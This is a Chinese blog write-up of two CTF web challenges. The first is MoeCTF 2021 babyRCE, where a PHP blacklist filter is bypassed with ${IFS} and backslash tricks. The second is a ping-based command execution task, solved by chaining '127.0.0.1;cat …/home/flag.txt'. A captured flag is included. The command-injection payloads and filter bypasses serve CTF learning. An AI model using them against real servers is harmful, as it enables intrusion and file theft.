【CTF刷题9】2024.10.19

最新推荐文章于 2025-05-27 18:30:31 发布
最新推荐文章于 2025-05-27 18:30:31 发布
阅读量738 收藏 5
点赞数 15
分类专栏: CTF刷题writeup 文章标签: CTF 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/star3119391396/article/details/143082223
版权
[MoeCTF 2021]babyRCE

考点:关键词过滤(绕过方法参考往期博客)

来源:nssctf

 <?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

先用ls查看

image-20241019170841483

空格可以用${IFS}绕过
构造payload:

?rce=ca\t${IFS}fl\ag.php

image-20241019170919138

command_execution

考点:命令执行

来源:攻防世界

image-20241019182142415

先ping一下127.0.0.1

image-20241019182650673

再用;来连接两个命令 127.0.0.1;ls

image-20241019182844520

试试看能不能查看inddex.php

127.0.0.1;cat index.php

image-20241019183259450

很明显,不行,那就退级看看

image-20241019183409397

在home中发现flag。

image-20241019183459124

查看flag

127.0.0.1;cat …/…/…/home/flag.txt

image-20241019173221179

cyberpeace{ac541782e73fa1da4a98ec4bc3449fb1}
2024年最全NSSCTF之Misc篇记录(15)_ctf huyao(1),阿里P8架构师
m0_60452293的博客
05-05 808
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
CTF笔记 - misc方向 - 电子取证 内存分析_ctf 镜像恶意进程分析(1)
碧海朝天素
04-08 1308
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
MoeCTF 2021Re部分------baby_bc
寻梦&之璐
10-20 766
文章目录baby.bc编译ida分析Rc4初始化加密Base64变形结果数组解密代码: baby.bc 编译 llc chall.bc -o chall.s 然后把.s(汇编代码搞成可执行程序)在进行编译的时候出现了如下报错: gcc -c chall.s -o hello 报错如下: chall.s: Assembler messages: chall.s:4: Error: unknown pseudo-op: `.def' chall.s:5: Error: unknown pseudo-o
【无标
2303_77961060的博客
06-04 1143
代码审计,rce,没有过滤ls,直接传参?rce=ls有flag.php,直接cat命令打开构造:?打开源代码也可以用tac命令?可以直接打印出来。
Web------RCE知识点及wp
2301_80708520的博客
01-29 2662
RCE好难啊!
NSSCTF-Web目24(RCE-空格绕过、过滤绕过)
weixin_54055099的博客
07-06 611
RCE-空格绕过
[MoeCTF 2021]——Web方向 wp
Leaf_initial的博客
08-09 2443
这里注意必须是0才可以,因为只有一个f1Ag的值往进传,所以前后必须是一样的,如果为其他数字的话需要俩个变量往进传。中的值代入进去,然后找到他的所属类,然后找到FLAG中的全局变量flag。__get() :获得一个类的不可访问或者不存在的成员变量时调用。__call():在对象上下文中调用不可访问的方法时触发。这里不多阐述原型链污染的概念了,可以去看p神的文章。提示我们可以有十点属性来分配,分配肯定是打不过的。游戏,要求我们打到5w分,基本上是达不到的。在源码中找到控制分数的属性,
NSSCTFweb部分
weixin_74427106的博客
10-25 1463
这个源码泄露,可以记录一下,涉及的知识点比较多打开环境查看源码,第一段flag乱码,恢复一下剩下的就只说方法第三段flag就在这里,也是乱码恢复扫出来的目录就是第四段和第六段flag第五段在第四段有提示说和苹果有关系发现第四段flag通过搜索发现苹果和DS_store有关系访问/.DS_store得到第五段flag,和起来就是完全的flag。
2024年最全对CTF很感兴趣,应该如何入手?,2024年最新2024最新网络安全面试及答案
2401_84545088的博客
05-05 1058
加入一个氛围较好的社群,有讨论才有进步跟老司机一起打比赛,增进感(ji)情(qing)也增加技术找到一个好的系统的学习资料正好,今天,由国内老牌CTF战队FlappyPig撰写的新书《CTF特训营:技术详解、解方法与竞赛技巧》上线京东预售了,据我所知这应该是国内第一本以CTF知识为主的图书。
PolarDN MISC做笔记
lakeside1的博客
02-22 870
PolarD&N MISC类做笔记
[SWPUCTF 2021 新生赛]babyrce(详解)
A_B_c_d_E_fsad的博客
04-04 2868
最近遇到的事太霉了,又是做到一半,靶机拒绝连接我,搞得我做都不自信了回到正文目如下(示例):phpelseecho "小饼干最好吃啦!?>小饼干最好吃啦!看了一下,就是cookie值admin等于1时,就能包含文件,行吧,那就等于吧第一次尝试,用了HackBar直接cookie,嘶?坏了?不确定,就用BurpSuite再试一下(如果成功了,那就跳过这部分,当我没说)第二次,可以是我响应太多没响应到,常规的都不行,那就只能用最原始的办法了。
2021西电MoeCTF
little_L_A的博客
09-27 2736
MOECTF新生赛wpwebweb_Lnc web web_Lnc 目 <?php error_reporting(0); include_once "flag.php"; $a=$_GET['a']; $b=$_POST['b']; if(isset($a)){ if($a!=$b&&md5($a)===md5($b)){ echo $flag; }else{ echo 'try again'; } }else{ hi
Moectf2021web
qq_45845771的博客
09-27 1655
[toc] eeeeeeeeeeezunserialize 知识点: pop链的构造:主要看这篇文章https://paper.seebug.org/1480/ [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7fWdPkQI-1632746009325)(C:\Users\yuan\AppData\Roaming\Typora\typora-user-images\image-20210906180953364.png)] POC <?php class entra
[SWPUCTF 2021 新生赛]babyrce
qq_62046696的博客
05-10 2461
打开界面看见if选项admin=1果断想到用burp抓包然后cookie给admin=1,获取下一步指令 然后url访问, <?php error_reporting(0); highlight_file(__FILE__); error_reporting(0); if(isset($_GET['url'])){ $ip=$_GET['url']; if(preg_match("//",$ip)){ die('nonono'); } $a=shel...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8708
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Web安全测试-文件上传绕过-DVWA
最新发布
lza20001103的博客
05-27 381
Web安全测试-文件上传绕过-DVWA
如何保护网络免受零日漏洞攻击?
endpointcentral的博客
05-27 1129
它自动化了完整的终端管理生命周期,从简单的系统配置到复杂的软件部署。IT安全是另一个主要问,许多易受攻击和未打补丁的设备面临恶意软件和漏洞利用的风险,但没有明确的方法来了解问的总体规模或如何应对新的威胁。借助Endpoint Central,找到了一个单一、经济高效的解决方案,可以集成服务台所需的所有功能,包括远程支持、补丁管理、资产管理和软件部署。借助Endpoint Central的统一终端管理方法,能够相对轻松地执行所有移动配置、部署和安全管理任务,为客户提供更快、响应更快的服务。
WEB安全--RCE--webshell HIDS bypass4
m0_74800552的博客
05-27 454
我们回过头来看$da->getTimestamp()>=1725329100||$n='1' ,当$da->getTimestamp()>=1725329100为假,$n='1'就会执行赋值的操作,这时$n的值就由'F'变为'1',但是当$da->getTimestamp()>=1725329100为真,那么就不会执行$n='1'的操作,$n='F'的值就不变了。此时满足时间条件,$n='F',ltrim从参数的默认值常量名中去掉前导的$n,也就是说FSYSTEM会变成SYSTEM,就能构成命令执行。
网络安全-等级保护(等保) 3-2-2 GB/T 28449-2019 第7章 现场测评活动/第8章 报告编制活动
项目管理到售前,一路成长的伙伴!
05-26 462
GB/T 28449-2019《信息安全技术 网络安全等级保护测评过程指南》是规定了。上两章我们展开说明了 测评准备活动,包括三项主要任务,方案编制活动,包含测评对象确定、测评指标确定、测评内容确定、工具测试方法确定、测评指导书开发及测评方案编制六项主要任务。。
ctf web文件上传.user
03-24
### CTF Web 文件上传漏洞利用技巧 #### 背景概述 文件上传漏洞是CTF竞赛中常见的Web安全挑战之一。这种类型的漏洞通常涉及攻击者通过绕过前端或后端验证机制,成功上传恶意脚本到目标服务器上,并最终实现远程代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梦 & 醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值